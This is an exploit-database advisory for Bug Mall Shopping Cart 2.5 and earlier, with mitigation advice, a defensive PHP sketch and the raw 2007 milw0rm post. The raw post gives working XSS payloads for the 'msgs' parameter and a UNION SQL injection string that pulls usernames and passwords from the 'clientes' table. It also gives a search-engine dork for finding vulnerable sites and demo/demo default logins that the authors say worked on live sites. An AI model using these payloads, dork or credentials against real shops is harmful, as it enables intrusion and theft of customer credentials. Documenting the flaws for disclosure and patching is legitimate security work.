Vendor: Shopping Cart
By: t0pP8uZz & xprog
CVSS: 5.5 (MEDIUM)
CWE: SQL Injection, XSS, Default Logins
Product Name: Shopping Cart
Affected Version From: 2.5 and prior
Patch Exists: NO

BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITIES

The Bug Mall Shopping Cart 2.5 and prior versions are vulnerable to SQL injection, cross-site scripting (XSS), and default login vulnerabilities. The SQL injection vulnerability can be exploited through the search box, allowing an attacker to execute arbitrary SQL queries. The XSS vulnerability can be exploited by injecting HTML or JavaScript code into the 'msgs' parameter. The script also seems to have a default login with the username 'demo' and password 'demo'.

Mitigation:

To mitigate the SQL injection vulnerability, input validation and parameterized queries should be implemented. The XSS vulnerability can be mitigated by properly encoding user input. The default login should be disabled or the password should be changed to a strong and unique one.
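The three mitigations above, sketched as an added example in PHP (not code from Bug Mall or from the advisory authors). The `products` table, the function names and the sample rows are assumptions made for illustration; the `clientes` table with `username` and `password` columns is taken from the advisory's query.

```php
<?php
declare(strict_types=1);
// Constructed in-memory data so the script runs offline (needs pdo_sqlite).
// `products` is a hypothetical table; `clientes` is named in the advisory.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("CREATE TABLE clientes (username TEXT, password TEXT)");
$db->exec("INSERT INTO products (name) VALUES ('USB keyboard'), ('Laptop bag')");
$db->exec("INSERT INTO clientes VALUES ('demo', 'demo'), ('alice', 'x')");

// Search box: the term is bound as data, never concatenated into the SQL text.
function search_products(PDO $db, string $term): array
{
    // Escape LIKE wildcards so % and _ typed by the user match literally.
    $like = '%' . strtr($term, ['!' => '!!', '%' => '!%', '_' => '!_']) . '%';
    $stmt = $db->prepare("SELECT id, name FROM products WHERE name LIKE :q ESCAPE '!'");
    $stmt->execute([':q' => $like]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// msgs parameter: encode for the HTML context before echoing it back.
function render_msgs(string $msgs): string
{
    return htmlspecialchars($msgs, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Default login: list accounts still using the demo/demo pair so they can be
// disabled or rotated. Covers plaintext and password_hash() storage.
function default_accounts(PDO $db): array
{
    $hits = [];
    foreach ($db->query("SELECT username, password FROM clientes") as $row) {
        $stored = (string) $row['password'];
        if ($row['username'] === 'demo'
            && (hash_equals($stored, 'demo') || password_verify('demo', $stored))) {
            $hits[] = $row['username'];
        }
    }
    return $hits;
}

// Constructed inputs: a search term containing a quote, and a script tag.
var_dump(search_products($db, "keyboard' and 1=2 --"));
var_dump(search_products($db, "keyboard"));
echo render_msgs('<script>alert("XSS")</script>'), PHP_EOL;
print_r(default_accounts($db));
```

Run the default-account check at install time or from a scheduled job, and treat any hit as a deployment blocker.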

Exploit-DB raw data:

--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITIES      +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog (Excellent Work xprog thanks :D)


SCRIPT DOWNLOAD: http://www.bug-mall.org/downloads/bugmall.zip

ORIGINAL ADVISORY CAN BE FOUND HERE: http://www.h4cky0u.org/viewtopic.php?t=26834


SITE: http://www.bug-mall.org


DORK: Powered by Bug Software intext:Your Cart Contains


EXPLOITS:

EXPLOIT 1: http://www.site.com/BugMallPAth/index.php?msgs=[HTML, JAVASCRIPT]
EXPLOIT 2: The basic search box is vulnerable to sql injection, check examples for detail.
EXPLOIT 3: The script seems to have a default login, username: demo password: demo, we have tried this on several sites
and successfully logged in.


EXAMPLES:

EXAMPLE 1 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<html><body>VULN BY<br>t0pP8uZz<br>h4cky0u.org</body><html>
EXAMPLE 2 ON DEMO: http://www.bug-mall.org/computerstore/index.php?msgs=<script>alert("XSS")</script>
EXAMPLE 3: Paste following into search box 
' and 1=2 UNION ALL SELECT 1,2,3,4,concat(username,':',password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102 from clientes/*


Note: Some servers may be running an older version of MYSQL, which makes it harder to inject without UNION.

GREETZ: str0ke, GM, andy777, Untamed, Don, o0xxdark0o, & everyone at H4CKY0u.org, BHUNITED AND G0t-Root.net

FROM GM!: Kw3[R]ln get over it :D.


--==+================================================================================+==--
--==+           BUG MALL SHOPPING CART 2.5 AND PRIOR SQL, XSS, DEFAULT LOGINS VULNERABILITIES      +==--
--==+================================================================================+==--

# milw0rm.com [2007-06-25]